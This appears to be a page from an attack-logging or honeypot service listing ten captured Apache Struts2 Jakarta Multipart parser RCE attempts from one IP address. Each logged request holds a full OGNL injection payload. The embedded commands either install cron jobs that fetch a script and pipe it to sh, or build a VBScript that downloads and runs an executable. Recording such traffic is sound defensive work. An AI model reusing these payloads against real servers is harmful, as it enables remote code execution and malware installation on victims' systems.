This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 6486 results (649 pages)

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 18:24:49
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /struts2-showcase/showcase.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 17:27:00
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 09:52:17
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 06:22:57
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 18:19:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 09:51:44
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/18 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/28 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 05:11:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 03:35:53
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 25/04/2017 09:50:04
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/18 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/28 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 25/04/2017 01:22:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /login.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/17 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/27 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}